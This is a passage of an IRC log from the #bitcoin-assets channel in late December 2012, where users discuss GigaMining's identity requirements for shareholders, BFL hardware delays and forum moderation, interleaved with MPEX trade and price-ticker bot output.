01:45:29 [MPEX] [S.MPOE] 1837 @ 0.00064 = 1.1757 BTC [+] Dec 26 01:45:43 no not really I offerd him to just pay me 0.1 btc per share and be done with it Dec 26 01:46:16 I will not send my personal data to a stranger Dec 26 01:46:21 period Dec 26 01:46:33 but you'll send him money Dec 26 01:46:40 I made that mistake once not twice Dec 26 01:46:54 its not your personal data Dec 26 01:46:58 its your company's Dec 26 01:47:13 Oh it is, My name , address, etc is personal Dec 26 01:47:28 nope, its the fdbf corporate identity. Dec 26 01:47:55 sure, I am not gonna glue my name to FDBF Dec 26 01:48:08 you may not have to. Dec 26 01:48:30 there are ways under EU law to hide the personal data of corporate officers. Dec 26 01:48:50 I have to investigate that first Dec 26 01:49:34 But the main thing is, sending personal data to claim, wtf Dec 26 01:50:26 I already explained that one to you Dec 26 01:50:32 its required by law in some states Dec 26 01:50:38 all shareholders must be known to the state Dec 26 01:50:56 I know, at some point I can understand it, but but but Dec 26 01:51:03 no but but but Dec 26 01:51:08 if hes following the law, then thats it Dec 26 01:51:54 Yeah but if I follow the law, then I am not able to send my data if I wish Dec 26 01:52:14 I really doubt EU law wont let you claim an investment in a foreign company Dec 26 01:53:08 gigavps does not have a registred company that fits EU regulations Dec 26 01:53:23 then request to giga that he does. Dec 26 01:53:28 So no its not possible Dec 26 01:54:16 [06:53:20] then request to giga that he does. Dec 26 01:54:56 It will cost him some time and money and maybe even a company change of activities so I doubt giga will do that Dec 26 01:55:20 don't invest in giga Dec 26 01:55:24 BANK RUN Dec 26 01:55:26 PANIC SELL Dec 26 01:55:28 sell gigabonds Dec 26 01:55:32 I wont in the future Dec 26 01:55:42 PsychoticBoy: you may have violated EU law by investing in giga in the first place Dec 26 01:55:48 so dont think you magically get out of this by not claiming Dec 26 01:56:07 You can buy mine, Ill give the email address and btcaddress and even the btc privatekey if you buy my shares Dec 26 01:56:43 not interested. Dec 26 01:56:53 PsychoticBoy: you may have violated EU law by investing in giga in the first place << I probably did Dec 26 01:57:13 GLBSE was not legal in the first place so Dec 26 01:57:27 gigamining is not legal when it was on GLBSE Dec 26 01:58:17 SELL SELL SELL SELL PANIC SELL Dec 26 01:58:21 ;;ticker Dec 26 01:58:22 BTCUSD ticker | Best bid: 13.35001, Best ask: 13.38415, Bid-ask spread: 0.03414, Last trade: 13.35001, 24 hour volume: 13165.68956219, 24 hour low: 13.14000, 24 hour high: 13.43000, 24 hour vwap: 13.31228 Dec 26 02:01:21 Ok I will think things over, but I am most certain that all my gigamining shares must be counted as a loss Dec 26 02:03:21 that's a lot of money Dec 26 02:03:28 30 btc? Dec 26 02:03:32 oh Dec 26 02:03:36 I thought you said 70 Dec 26 02:03:39 at highet 1.5 btc x 117 Dec 26 02:03:51 ;;calc 1.5 * 117 Dec 26 02:03:52 175.5 Dec 26 02:03:57 probably worth 0.3 atm Dec 26 02:04:52 ;;calc 0.3 * 117 Dec 26 02:04:52 35.1 Dec 26 02:04:55 investors paid ~0.7 btc a share Dec 26 02:05:29 so a total investment of more than 70 btc Dec 26 02:05:49 ;;getrating Batteryfire Dec 26 02:05:50 Currently authenticated from hostmask Batteryfire!~solomonch@c-76-97-22-23.hsd1.ga.comcast.net . User batteryfire, rated since Sun Dec 23 14:04:14 2012. Cumulative rating 5, from 2 total ratings. Received ratings: 2 positive, 0 negative. Sent ratings: 2 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=batteryfire Dec 26 02:05:56 It is still not worth any possible identity theft etc Dec 26 02:16:27 good night all I am going to bed, have a very nice Christmas Dec 26 02:29:06 you too dude Dec 26 02:29:12 pigeons: are you a pigeon? Dec 26 02:29:53 on the internet nobody knows you're a pigeon Dec 26 02:31:07 http://media.tumblr.com/tumblr_m72odw0NR01qgnsg4.jpg for you pigeons Dec 26 02:31:10 I'm sure you've seen it Dec 26 02:31:40 haha no, but i've been there ;) Dec 26 02:34:25 were you here for the giga discussion? Dec 26 02:34:35 sounds like a case for the mpex courts! Dec 26 02:34:41 ;;later tell Dec 26 02:34:41 (later tell ) -- Tells the next time is in seen. can contain wildcard characters, and the first matching nick will be given the note. Dec 26 02:38:29 ;;later tell PsychoticBoy perhaps you should file a case with the mpex court Dec 26 02:38:29 The operation succeeded. Dec 26 02:40:18 its a good idea, but i would guess giga wouldn't agree, he would seem to have more to lose Dec 26 02:43:53 wouldn't he have to if enough people filed against him? Dec 26 02:49:04 i was thinking about only PB filing a complaint, but yes if there were a large number he would be more likely to need to address it Dec 26 02:50:18 cause ultimately if giga doesn't comply and PB has a good case giga will get labeled a scammer via WoT? or what are the other repurcussions of "non-compliance" to the judge's ruling Dec 26 02:50:22 ?* Dec 26 02:52:54 i'm not sure, i think the defendent has to agree to the proceedings before they are heard Dec 26 02:53:28 [MPEX] [S.MPOE] 1327 @ 0.00064 = 0.8493 BTC [+] Dec 26 02:53:41 also note the claim needs to be for over 100 BTC Dec 26 02:54:58 ah Dec 26 03:18:57 [MPEX] [S.MPOE] 8500 @ 0.00064 = 5.44 BTC [+] Dec 26 03:19:50 [MPEX] [S.MPOE] 1650 @ 0.00064 = 1.056 BTC [+] Dec 26 03:42:05 [MPEX] [S.MPOE] 4900 @ 0.00064 = 3.136 BTC [+] Dec 26 03:45:42 so dead in here Dec 26 03:46:28 yeah. by the time i fuck around and pay for stuff to send and the other fuckery..... i consider my gigamining bonds another rip off. Dec 26 03:46:33 [MPEX] [S.MPOE] 7150 @ 0.00064 = 4.576 BTC [+] Dec 26 03:47:12 for someone that "only deals in bitcoins" it is not an acceptable solution Dec 26 04:06:08 [MPEX] [S.MPOE] 5000 @ 0.00064 = 3.2 BTC [+] Dec 26 04:13:22 [MPEX] [S.MPOE] 1300 @ 0.00064 = 0.832 BTC [+] Dec 26 04:14:49 Graet: you only deal in bitcoins? Dec 26 04:15:56 i need to convert bitcoin to fiat to pay for servers, but i pay miners on my pool in bitcoin yes Dec 26 04:16:11 thyat was quoting giga Dec 26 04:29:31 hmm Dec 26 04:29:47 we should get people to pull their money out of giga and put them into your pool ;) Dec 26 04:31:12 um, ppl mine with gpus and f[gas atm, not reall an aption to "put money inb" Dec 26 04:31:21 fpgas* Dec 26 04:31:45 ozcoin.net if you arent aware :) Dec 26 04:34:12 [MPEX] [S.MPOE] 1400 @ 0.00064 = 0.896 BTC [+] Dec 26 04:38:40 [MPEX] [S.MPOE] 10750 @ 0.00064 = 6.88 BTC [+] Dec 26 04:44:09 i see Dec 26 04:44:16 I'm not a miner Dec 26 05:03:00 [MPEX] [S.MPOE] 10000 @ 0.00064 = 6.4 BTC [+] Dec 26 05:05:44 it's dead in here tonight **** BEGIN LOGGING AT Wed Dec 26 12:04:37 2012 Dec 26 12:05:05 smickles nope i have not. the values themselves aren't strictly fixed. Dec 26 12:07:28 [MPEX] [S.DICE] 1500 @ 0.00355774 = 5.3366 BTC [+] Dec 26 12:08:05 sooo what's new ? **** BEGIN LOGGING AT Wed Dec 26 12:13:19 2012 Dec 26 12:15:16 [MPEX] [S.MPOE] 6550 @ 0.00064 = 4.192 BTC [+] Dec 26 12:21:52 [MPEX] [S.MPOE] 9354 @ 0.00064 = 5.9866 BTC [+] Dec 26 13:13:23 Good morning Christmas ppl Dec 26 13:14:37 morning Dec 26 13:15:08 whats up with the BFL drama Dec 26 13:42:59 http://trilema.com/2012/anonimity-or-the-urban-versus-rural-dispute/ Dec 26 13:43:04 if anyone feels like a heavier piece. Dec 26 13:53:34 [MPEX] [S.MPOE] 3400 @ 0.00064 = 2.176 BTC [+] Dec 26 14:07:14 [MPEX] [S.MPOE] 700 @ 0.00064 = 0.448 BTC [+] Dec 26 14:09:03 [MPEX] [S.MPOE] 11000 @ 0.00064 = 7.04 BTC [+] Dec 26 14:47:47 [MPEX] [S.MPOE] 8525 @ 0.00064 = 5.456 BTC [+] Dec 26 14:54:20 [MPEX] [S.MPOE] 9300 @ 0.00064 = 5.952 BTC [+] Dec 26 15:05:01 [MPEX] [S.MPOE] 2417 @ 0.00064 = 1.5469 BTC [+] Dec 26 15:34:36 [MPEX] [S.MPOE] 5600 @ 0.00064 = 3.584 BTC [+] Dec 26 15:38:19 [MPEX] [S.MPOE] 5150 @ 0.00064 = 3.296 BTC [+] Dec 26 15:58:13 [MPEX] [S.MPOE] 7600 @ 0.00064 = 4.864 BTC [+] Dec 26 15:59:39 mircea_popescu: so you think cities < village coz anonymity is hindrence for information? Dec 26 16:13:26 [MPEX] [S.MPOE] 9644 @ 0.00064 = 6.1722 BTC [+] Dec 26 16:17:46 imho he did not meant that villages are better. just that cities are just considered unstable due to that information problem Dec 26 16:19:24 i found it interesting, but rather one-sided consideration Dec 26 16:20:33 it's not just goat stealers who find unbearable these "social mores" and impossibility to choose people you want to interact with Dec 26 16:23:39 these greek cities were such...when you were expunged ("ostracised" word was born there) = social death. not sure if it's so much desirable Dec 26 16:33:47 yeah, i think of cities more of statistical stability by mass Dec 26 16:34:12 [MPEX] [S.MPOE] 9492 @ 0.00064 = 6.0749 BTC [+] Dec 26 16:34:12 if i need to find that _one_ goat, of course the information in a village to find it is cheaper Dec 26 16:35:21 but if i want to find _any_ goat cheese, it's more likely i find one in a city (the village has goat farmers or it doesn't) Dec 26 16:48:22 he said goat Dec 26 16:48:56 [MPEX] [S.MPOE] 11200 @ 0.00064 = 7.168 BTC [+] Dec 26 16:50:49 as city person i'm not interested in a goat, only in it's cheese or meat Dec 26 16:52:38 Diablo-D3: there is another option besides bfl being a long con and bfl shipping, and that's bfl doesn't ship cause they fail and suck and design, production, logistics, management, etc Dec 26 16:53:28 duh Dec 26 17:00:52 [MPEX] [S.MPOE] 3250 @ 0.00064 = 2.08 BTC [+] Dec 26 17:04:59 [MPEX] [S.MPOE] 31950 @ 0.00064 = 20.448 BTC [+] Dec 26 17:07:57 [MPEX] [S.MPOE] 3200 @ 0.00064 = 2.048 BTC [+] Dec 26 17:21:18 [MPEX] [S.MPOE] 4300 @ 0.00064 = 2.752 BTC [+] Dec 26 17:28:56 derpity derp Dec 26 17:53:02 [MPEX] [S.MPOE] 4921 @ 0.00064 = 3.1494 BTC [+] Dec 26 18:39:40 [MPEX] [S.MPOE] 7600 @ 0.00064 = 4.864 BTC [+] Dec 26 19:16:58 [MPEX] [S.MPOE] 12850 @ 0.00064 = 8.224 BTC [+] Dec 26 19:50:55 [MPEX] [S.MPOE] 4600 @ 0.00064 = 2.944 BTC [+] Dec 26 19:58:00 [MPEX] [S.MPOE] 45570 @ 0.00064 = 29.1648 BTC [+] Dec 26 20:08:00 [MPEX] [S.MPOE] 11054 @ 0.00064 = 7.0746 BTC [+] Dec 26 20:15:53 ;;tslb Dec 26 20:15:56 Time since last block: 29 minutes and 13 seconds Dec 26 20:18:43 [MPEX] [S.MPOE] 11400 @ 0.00064 = 7.296 BTC [+] Dec 26 20:23:57 ;;ticker Dec 26 20:23:58 BTCUSD ticker | Best bid: 13.32904, Best ask: 13.34999, Bid-ask spread: 0.02095, Last trade: 13.35000, 24 hour volume: 11550.37949720, 24 hour low: 13.20001, 24 hour high: 13.39890, 24 hour vwap: 13.29651 Dec 26 20:29:42 [MPEX] [S.MPOE] 8350 @ 0.00064 = 5.344 BTC [+] Dec 26 20:32:14 [MPEX] [S.MPOE] 7600 @ 0.00064 = 4.864 BTC [+] Dec 26 20:39:20 [MPEX] [S.MPOE] 5100 @ 0.00064 = 3.264 BTC [+] Dec 26 20:49:54 [MPEX] [S.MPOE] 697 @ 0.00064 = 0.4461 BTC [+] Dec 26 20:52:09 [09:11:46] lol Diablo-D3. I love Josh's post. 'all rational people base their opinions on evidence' yet they give us 0 evidence ASICs exist. So therefore we can't have any opinions on BFL according to Josh? Dec 26 20:52:23 [05:51:03] "Diablo-D3 | he cant payout to shareholders -- that would be illegal" - LOL, in this case he broke the law when he SOLD the shares for start and the circus he is running now... pff... is ugly and only to benefit himself Dec 26 20:52:32 EskimoBob: yes, it would be illegal to have sold them to begin with Dec 26 20:52:56 EskimoBob: it would have been the intention of not telling the government who his shareholders are that would make it illegal, btw Dec 26 20:53:50 Diablo-D3 they don't have to give info, they have ppl's money Dec 26 20:57:21 gigavps: no, in some states you have to tell the state who owns part of the company Dec 26 20:57:22 gigavps Is there any way for me to buy shares of gigamining off of people who don't want to send in their AML stuff to you? Dec 26 20:57:49 gigavps: its technically for partners, but unlisted privately held shares are the same for those states Dec 26 20:58:05 Bugpowder if i do that, i'm out of business Dec 26 20:58:27 i'd need to register with all the three letter acros Dec 26 20:58:28 :-( Dec 26 20:59:10 would cost a whole boat load of $$$$ Dec 26 21:00:14 hmm... ok. so I can only claim my own shares then Dec 26 21:00:26 did you see this? Dec 26 21:00:27 http://www.nytimes.com/2012/12/27/business/smallbusiness/why-the-sec-is-likely-to-miss-its-deadline-to-write-crowdfunding-rules.html?hpw Dec 26 21:02:39 [MPEX] [S.MPOE] 11179 @ 0.00064 = 7.1546 BTC [+] Dec 26 21:30:06 [MPEX] [S.MPOE] 12160 @ 0.00064 = 7.7824 BTC [+] Dec 26 21:31:43 ;;ticker Dec 26 21:31:43 BTCUSD ticker | Best bid: 13.37991, Best ask: 13.38890, Bid-ask spread: 0.00899, Last trade: 13.38890, 24 hour volume: 11700.80747747, 24 hour low: 13.20001, 24 hour high: 13.39890, 24 hour vwap: 13.29785 Dec 26 21:33:44 [MPEX] [S.MPOE] 8116 @ 0.00064 = 5.1942 BTC [+] Dec 26 21:35:03 [MPEX] [S.MPOE] 4200 @ 0.00064 = 2.688 BTC [+] Dec 26 21:49:12 ;;ticker Dec 26 21:49:12 BTCUSD ticker | Best bid: 13.35001, Best ask: 13.40000, Bid-ask spread: 0.04999, Last trade: 13.35001, 24 hour volume: 11941.19136899, 24 hour low: 13.20001, 24 hour high: 13.40000, 24 hour vwap: 13.30083 Dec 26 21:53:48 FabianB i don't particularly think > or < Dec 26 21:53:52 just different things Dec 26 21:53:53 [MPEX] [S.DICE] 1958 @ 0.00349579 = 6.8448 BTC [-] Dec 26 22:22:19 [MPEX] [S.MPOE] 39400 @ 0.00064 = 25.216 BTC [+] Dec 26 22:32:15 [MPEX] [S.MPOE] 9850 @ 0.00064 = 6.304 BTC [+] Dec 26 22:39:32 ;;ident Dec 26 22:39:32 You are not identified. Dec 26 22:39:37 ;;eauth smickles Dec 26 22:39:37 Request successful for user smickles, hostmask smickles!~smickles@mostofmany.com. Get your encrypted OTP from http://bitcoin-otc.com/otps/EA62D7CEB2450C3F Dec 26 22:40:23 ;;ident Dec 26 22:40:24 You are identified as user smickles, with GPG key id EA62D7CEB2450C3F, key fingerprint 96ACCA7C3B09EC61B0A6D7F9EA62D7CEB2450C3F, and bitcoin address 12NjnZTVeTJ3g5C7BqfS2aQ2rLkmwiqVz6 Dec 26 22:47:39 [MPEX] [S.MPOE] 4650 @ 0.00064 = 2.976 BTC [+] Dec 26 23:08:24 sure Dec 26 23:13:52 LOL Dec 26 23:13:56 theymos removed me as mod Dec 26 23:14:01 because I put everyone in timeout Dec 26 23:14:08 I guess thats the end of bitcointalk Dec 26 23:14:09 the scammers won Dec 26 23:15:25 mod, not admin Dec 26 23:15:49 so, if someone dox the entire BFL staff and their close family, well, I wont be able to stop that Dec 26 23:16:35 so I think theymos is a bfl shill Dec 26 23:16:44 why else would he want the hardware forum's front page all bfl threads Dec 26 23:17:50 yeah, I think that day I threw all the bfl threads in offtopic was the most mod actions ever. Dec 26 23:18:22 [MPEX] [O.BTCUSD.C130T] 1 @ 0.03968734 BTC [-] Dec 26 23:18:50 [MPEX] [O.BTCUSD.P130T] 1 @ 0.02400107 BTC [+] Dec 26 23:19:05 [MPEX] [O.BTCUSD.C140T] 1 @ 0.01359389 BTC [-] Dec 26 23:20:48 [MPEX] [S.MPOE] 8100 @ 0.00064 = 5.184 BTC [+] Dec 26 23:21:27 welp, we now know who the enemies of the community are Dec 26 23:21:44 and guess what, I outrank theymos in bitcoin deity status Dec 26 23:21:51 so lets see how he fixes this one Dec 26 23:22:44 sounds miserable Dec 26 23:24:30 the 9 months of clouds... Dec 26 23:29:55 EskimoBob: EVERYONE. Dec 26 23:30:01 MUWAHAHAHAHAHAHA Dec 26 23:34:02 EskimoBob: seriously though Dec 26 23:34:10 I wonder why theymos sided with the scammers Dec 26 23:42:13 [MPEX] [S.MPOE] 12672 @ 0.00064 = 8.1101 BTC [+] Dec 26 23:46:58 [MPEX] [S.MPOE] 13236 @ 0.00064 = 8.471 BTC [+] Dec 26 23:48:12 hmmn Dec 26 23:49:21 everyone being the enemy? Dec 26 23:51:49 EskimoBob: its an evil laugh Dec 26 23:52:52 you obviously didnt get it Dec 26 23:53:30 and thats older than comics Dec 26 23:54:14 bitcoin deity status - wtf? Dec 26 23:54:38 EskimoBob: say moo, then ha ha, ha ha, ha ha Dec 26 23:54:59 [MPEX] [S.MPOE] 10464 @ 0.00064 = 6.697 BTC [+] Dec 26 23:55:00 jurov: yes, I am a bitgod. Dec 26 23:55:11 EskimoBob: well, its more of a muah Dec 26 23:55:12 Diablo-D3, how so? Dec 26 23:55:34 jurov: one of the first 100 users, wrote diablominer, brought the most people into the community, etc etc Dec 26 23:57:22 meh. i could have been there too. remember trying some early version of bicoin-qt, it did not work. Dec 26 23:57:34 i gave up and forgot till 2011 Dec 26 23:58:00 lol, bitcoin-qt didnt even exist yet Dec 26 23:58:40 it's all mostly chance Dec 26 23:58:41 ;;ub Dec 26 23:58:41 Error: "ub" is not a valid command. Dec 26 23:59:15 ;;google urban muahaha Dec 26 23:59:16 Urban Dictionary: muahaha: ; Urban Dictionary: MUAHAHAHAHA: ; Urban Dictionary: Author muahaha: Dec 26 23:59:26 fyi. Dec 26 23:59:45 oh smite me Dec 27 00:02:07 ;;ud smite Dec 27 00:02:07 http://www.urbandictionary.com/define.php?term=smite | the use of god-like force in a way that cleaves,crushes or shatters said object or person. Dec 27 00:02:18 quite an oxymoron you got there Dec 27 00:02:33 I used lube. Dec 27 00:03:01 ofc i forgot, bitcoin gods have 55lbs barrels of lube handy Dec 27 00:04:01 no, 55 gallon drums more exactly Dec 27 00:10:35 so i got emails from btct that usagi had created assets for CPA and NYAN but their gone Dec 27 00:10:42 they're Dec 27 00:11:14 oops looking wrong place there they are Dec 27 00:20:49 [MPEX] [S.MPOE] 7250 @ 0.00064 = 4.64 BTC [+] Dec 27 00:27:06 [MPEX] [S.MPOE] 46200 @ 0.00064 = 29.568 BTC [+] Dec 27 00:31:51 so bitcoin tabloid has new site... Dec 27 00:32:00 and all old comments happen to be wiped Dec 27 00:32:51 no new articles Dec 27 00:34:30 no, there's one dated dec 25 2012.. from vitalik buterin? didn't they get rid of him? Dec 27 00:35:39 [MPEX] [O.BTCUSD.C130T] 1 @ 0.03956962 BTC [-] Dec 27 00:36:10 [MPEX] [O.BTCUSD.P130T] 1 @ 0.0232923 BTC [-] Dec 27 00:36:48 I believe that rewards based social media is the next logical step in this fascinating evolution of human interaction. Dec 27 00:37:00 oh my. kill with fire Dec 27 00:37:55 I believe that the Arab Spring is just the beginning of this social “awakening” that we are witnessing world wide. I believe that every single dictator in power today will not be there in 10 years’ time. Dec 27 00:38:49 mircea_popescu: truly something for both you and the girl to get hives from Dec 27 00:38:50 http://bitcoinmagazine.com/uptweet-social-media-and-bitcoin-meet-again/ Dec 27 00:39:27 lol i dun think anyone cares about the bitcoin rag. Dec 27 00:39:46 pigeons: okay its this Dec 27 00:39:58 usagi created assets at bitfunder Dec 27 00:40:02 then at btct Dec 27 00:40:25 and then bitfunder said "usagi isnt opening here, hes opening at btct" Dec 27 00:40:37 well, ukto said Dec 27 00:40:50 then usagi said "wtf, you stabbed me in the back, ukto is a spy!" Dec 27 00:41:23 and then ukto said "yes, my little cauliflower, I am the best spy that ever lived." Dec 27 00:44:01 lol Dec 27 00:47:25 isn't the forum stuff making your throat stiff and dry? Dec 27 00:47:38 oh yes, you use the lube Dec 27 00:48:06 mo, vwid sandviwtch I use beer Dec 27 00:48:43 medic, eh, he say not drink so much beer, bad for liver, what would medic know, eh? he is only german. Dec 27 00:49:05 and you are? czech? Dec 27 00:49:11 RUSSIAN! Dec 27 00:49:20 I AM HEAVY WEAPONS GUY. Dec 27 00:50:17 http://en.wikipedia.org/wiki/List_of_countries_by_alcohol_consumption Dec 27 00:50:57 [MPEX] [S.MPOE] 6346 @ 0.00064 = 4.0614 BTC [+] Dec 27 00:51:34 nuclear paper tiger Dec 27 00:52:16 russians should make love, not booze Dec 27 00:52:39 or heavy weapons Dec 27 00:52:59 :P Dec 27 00:59:33 then usagi said, "the illuminati who shut nefario down have threatened ukto, cause why else could ukto possible refuse to be associated with the great and terrible usagi?" Dec 27 01:01:48 Grace of almighty above and his sexy virgin, have mercy with that poor soul. Dec 27 01:05:54 i saw jurov kissing santa claus Dec 27 01:06:38 which one? Dec 27 01:06:56 heh Dec 27 01:09:33 May our Lord Jesus Christ wash this earth with His holy light and purge its darkest places from heathens and philistines. Dec 27 01:12:11 "And that servant, which knew his lord's will, and prepared not himself, neither did according to his will, shall be beaten with many stripes." Dec 27 01:13:05 #bitcoin-eligius Dec 27 01:13:16 ;> Dec 27 01:13:36 i just pasted a quote from dead man, seemed apropriate Dec 27 01:13:51 if you havent seen that move (anyone really)... go watch it Dec 27 01:18:55 ;;ticker Dec 27 01:18:56 BTCUSD ticker | Best bid: 13.37880, Best ask: 13.40000, Bid-ask spread: 0.02120, Last trade: 13.37854, 24 hour volume: 16004.35697487, 24 hour low: 13.20001, 24 hour high: 13.46997, 24 hour vwap: 13.33833 Dec 27 01:19:03 ;;seen smjckle Dec 27 01:19:03 I have not seen smjckle. Dec 27 01:19:08 ;;seen smickles Dec 27 01:19:08 smickles was last seen in #bitcoin-assets 2 hours, 38 minutes, and 44 seconds ago: ;;ident Dec 27 01:19:43 so. snow belt. nothing to play with. Dec 27 01:19:45 smickles is still busy with the mpex orders ids code Dec 27 01:20:15 thestringpuller, iirc you wanted to have some api? Dec 27 01:21:23 yea for mod6 and i Dec 27 01:21:35 ima talk with him soon Dec 27 01:23:24 its for the mpex app Dec 27 01:23:45 mircea_popescu may think its weird still tho Dec 27 01:23:50 and api for an api Dec 27 01:23:55 an* Dec 27 01:26:52 [MPEX] [S.MPOE] 2800 @ 0.00064 = 1.792 BTC [+] Dec 27 01:27:20 okay Dec 27 01:27:51 must add key auth then, i guess you don't want to mess with cookies Dec 27 01:30:17 i have maybe 10 branches in git of various functions.... and as i know myself, i'll finish most of them at once. madness Dec 27 01:40:35 the octo-workflow lol Dec 27 01:40:46 < jurov> smickles is still busy with the mpex orders ids code <<< heh, actually, it took me about 20 min to write the code while taking care of my daughter and then a few hours trying to figure out why you thought it was so difficult Dec 27 01:40:59 p.s. i gave up Dec 27 01:41:05 LOL Dec 27 01:42:07 actually, I said that for humor. It would be more accurate to say that I figured we had different goals Dec 27 01:42:25 my code does what I want it to do, I'm sure your code does what you want it to do Dec 27 01:43:11 ;;ticker Dec 27 01:43:12 BTCUSD ticker | Best bid: 13.45001, Best ask: 13.45900, Bid-ask spread: 0.00899, Last trade: 13.45001, 24 hour volume: 15765.04593929, 24 hour low: 13.20001, 24 hour high: 13.46997, 24 hour vwap: 13.34181 Dec 27 01:49:38 [MPEX] [S.MPOE] 9400 @ 0.00064 = 6.016 BTC [+] Dec 27 01:52:07 !ticker S.DICE Dec 27 01:52:09 [MPEX:S.DICE] 1day: 0.00349579 / 0.00352604 / 0.00355774 (7437 shares, 26.22 BTC), 30day: 0.0014 / 0.0030785 / 0.0037 (8872282 shares, 27,313.38 BTC) Dec 27 01:53:16 !ticker S.MPOE Dec 27 01:53:18 [MPEX:S.MPOE] 1day: 0.00064 / 0.00064 / 0.00064 (656012 shares, 419.85 BTC), 30day: 0.00050368 / 0.0005583 / 0.00064 (81022468 shares, 45,234.99 BTC) Dec 27 01:56:28 [MPEX] [S.MPOE] 4450 @ 0.00064 = 2.848 BTC [+] Dec 27 02:06:16 [MPEX] [S.MPOE] 8700 @ 0.00064 = 5.568 BTC [+] Dec 27 02:10:08 [MPEX] [S.MPOE] 10486 @ 0.00064 = 6.711 BTC [+] Dec 27 02:44:56 [MPEX] [S.MPOE] 2600 @ 0.00064 = 1.664 BTC [+] Dec 27 02:57:43 [MPEX] [S.MPOE] 8000 @ 0.00064 = 5.12 BTC [+] Dec 27 03:18:58 [MPEX] [S.MPOE] 10153 @ 0.00064 = 6.4979 BTC [+] Dec 27 03:37:03 [MPEX] [S.MPOE] 8486 @ 0.00064 = 5.431 BTC [+] Dec 27 03:41:00 [MPEX] [S.MPOE] 17900 @ 0.00064 = 11.456 BTC [+] Dec 27 03:43:19 [MPEX] [S.MPOE] 1026 @ 0.00064 = 0.6566 BTC [+] Dec 27 04:04:37 mircea_popescu What's max pain for btc OpEx this month? Dec 27 04:10:21 [MPEX] [S.MPOE] 4269 @ 0.00064 = 2.7322 BTC [+] Dec 27 04:24:49 Bugpowder around 13ish Dec 27 04:24:54 i don't normally compute it Dec 27 04:26:19 heh, I could imagine it being a difficult number to look at often Dec 27 04:27:16 [MPEX] [S.MPOE] 1349 @ 0.00064 = 0.8634 BTC [+] Dec 27 04:28:37 ;;lucky thaumiting Dec 27 04:28:38 http://www.giantbomb.com/achievements/honey-badger-dont-care/117345/ Dec 27 04:29:30 ಠ_ಠ Dec 27 04:29:55 [MPEX] [S.MPOE] 9825 @ 0.00064 = 6.288 BTC [+] Dec 27 04:32:30 [MPEX] [S.MPOE] 2540 @ 0.00064 = 1.6256 BTC [+] Dec 27 04:32:41 mircea_popescu: do you like jazz? Dec 27 04:32:45 or are you a jazz hater? Dec 27 04:32:59 i like it Dec 27 04:33:24 ;;ticker Dec 27 04:33:24 BTCUSD ticker | Best bid: 13.44991, Best ask: 13.45000, Bid-ask spread: 0.00009, Last trade: 13.44991, 24 hour volume: 17358.44862787, 24 hour low: 13.20001, 24 hour high: 13.47000, 24 hour vwap: 13.35560 Dec 27 04:34:11 I'ma promote a jazz concert with BTC Dec 27 04:38:20 lol, somehow, i'm reminded of this girl in my highschool year, sara campen, she changed her name, legally, from what her parents named her (she already went by sara in defiance of them until she turned 18) Dec 27 04:38:29 Ima Gohen Campen Dec 27 04:40:12 oh smickles you silly goose Dec 27 04:40:38 how goes the bot to destroy the mpoe bot? Dec 27 04:41:37 heh, I'm not out to destroy mpoebot Dec 27 04:42:31 You're out to make more money than mpoebot ;) Dec 27 04:42:46 that would be quite nice Dec 27 04:43:07 I wouoldn't mind thousands of btc per month or something like that. Dec 27 04:43:27 i'd be the new mircea_popescu :D Dec 27 04:43:33 get you some bondholders first ;) Dec 27 04:43:44 and hope there isn't a pirate ponzi Dec 27 04:43:53 meh, then it wouldn't be my thousands of btc Dec 27 04:43:58 lol Dec 27 04:44:50 really, this market maker bot is an elaborate mission to taste real whiskey Dec 27 04:44:59 put your daughter's future college tuition up? Dec 27 04:45:07 real whiskey? Dec 27 04:45:14 from kentucky? (i kid) Dec 27 04:46:15 i think the majority of my daughter's future tuition is my wife's motgomery gi bill Dec 27 04:46:20 so no go there Dec 27 04:47:37 lol Dec 27 04:47:54 tell me about this mission to taste real whiskey Dec 27 04:47:59 which whiskey exactly? Dec 27 04:51:20 I dunno, I suppose I need to define the outcome :| Dec 27 04:52:23 porlly some kind of scotch Dec 27 04:52:32 i'll need a mentor! Dec 27 04:58:16 [MPEX] [O.BTCUSD.P130T] 1 @ 0.0205393 BTC [-] Dec 27 05:07:23 [MPEX] [S.MPOE] 8941 @ 0.00064 = 5.7222 BTC [+] Dec 27 05:18:21 [MPEX] [S.MPOE] 2600 @ 0.00064 = 1.664 BTC [+] Dec 27 05:23:40 [MPEX] [S.MPOE] 10272 @ 0.00064 = 6.5741 BTC [+] Dec 27 05:43:12 !ticker O.BTCUSD.C130T Dec 27 05:43:14 [MPEX:O.BTCUSD.C130T] 1day: 0.03956962 / 0.0413564 / 0.04481226 (3 shares, 0.12 BTC), 30day: 0.03956962 / 0.14250577 / 0.20783398 (12077 shares, 1,721.04 BTC) Dec 27 05:59:08 [MPEX] [S.MPOE] 8450 @ 0.00064 = 5.408 BTC [+] Dec 27 06:01:39 [MPEX] [S.MPOE] 10100 @ 0.00064 = 6.464 BTC [+] Dec 27 06:13:57 [MPEX] [S.DICE] 450 @ 0.00354391 = 1.5948 BTC [+] Dec 27 06:19:55 [MPEX] [S.MPOE] 8812 @ 0.00064 = 5.6397 BTC [+] Dec 27 06:30:03 [MPEX] [S.MPOE] 5950 @ 0.00064 = 3.808 BTC [+] Dec 27 06:33:45 [MPEX] [S.MPOE] 4900 @ 0.00064 = 3.136 BTC [+] Dec 27 06:41:19 [MPEX] [S.MPOE] 3900 @ 0.00064 = 2.496 BTC [+] Dec 27 06:47:57 [MPEX] [S.MPOE] 9250 @ 0.00064 = 5.92 BTC [+] Dec 27 06:52:30 Diablo-D3, pigeons: lol Dec 27 06:52:41 UKTO IS SPY! Dec 27 06:53:08 hrm, if ukto has dead ringer, does that mean ukto is now the little girl? Dec 27 06:53:36 cute little girls.. the most dangerous weapons in teh world Dec 27 06:57:23 [MPEX] [S.MPOE] 18950 @ 0.00064 = 12.128 BTC [+] **** BEGIN LOGGING AT Thu Dec 27 14:40:18 2012 Dec 27 14:55:48 [MPEX] [S.MPOE] 4050 @ 0.00064 = 2.592 BTC [+] Dec 27 15:03:39 [MPEX] [S.MPOE] 21500 @ 0.00064 = 13.76 BTC [+] Dec 27 15:10:31 [MPEX] [S.MPOE] 900 @ 0.00064 = 0.576 BTC [+] Dec 27 15:12:02 ;;ticker Dec 27 15:12:02 BTCUSD ticker | Best bid: 13.45848, Best ask: 13.45882, Bid-ask spread: 0.00034, Last trade: 13.45848, 24 hour volume: 20579.82684084, 24 hour low: 13.20001, 24 hour high: 13.47000, 24 hour vwap: 13.37609 Dec 27 15:16:02 [MPEX] 